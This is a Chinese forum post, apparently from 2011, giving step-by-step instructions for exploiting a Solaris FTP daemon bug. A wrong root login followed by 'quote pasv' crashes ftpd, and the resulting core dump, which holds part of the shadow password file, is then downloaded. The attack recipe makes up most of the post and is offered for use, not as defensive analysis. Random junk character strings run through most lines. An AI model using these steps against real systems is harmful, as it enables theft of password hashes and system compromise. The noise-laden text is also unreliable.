該方法利用了Solaris 操作系統(tǒng)中FTPD的一個(gè)BUG���,使得用戶可以獲得該機(jī)的口令文件��。具體過程如下:
/ }( I3 p3 b6 m1 w& k8 ?- L
3 o- {& i6 _. g1 N6 ]% s0 \1.通過 ftp 正常登錄到目的主機(jī)上. K- u& O3 W* S
6 m7 }% o- P# a7 U9 q# F
2.輸入如下命令序列:1 K2 a) M& Q' i+ l3 K
5 [0 I# i" ? @% E! O
ftp> user root wrongpasswd9 S5 o+ V4 j, ^" I# j( M, k$ q) Q
2 S( R: q' n. Y: H
ftp> quote pasv7 I' b$ k/ D; b$ a
( T. ?9 Y4 L2 w( m' @3.這時(shí)��,ftpd會(huì)報(bào)錯(cuò)退出�,同時(shí)會(huì)在當(dāng)前目錄下生成一個(gè)core����,口令文件就包含在這個(gè)core中��。1 d5 P! E" ?% |! t" A! R N5 F( _8 m
4 m2 N( \; V% u, [% ^4.再次進(jìn)入FTP >get core( U/ ?5 A* p8 |
; D% G/ a/ k/ `8 |6 S% b* k補(bǔ)充:雖然在core只有一部分shadow��,但是對(duì)于系統(tǒng)來說已經(jīng)是致命的打擊了
! C1 |6 Y, J b) C' }: _* }2 V- j9 F/ T( ]% F3 l% N( T
|
發(fā)表于 2011-1-12 21:01:38
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡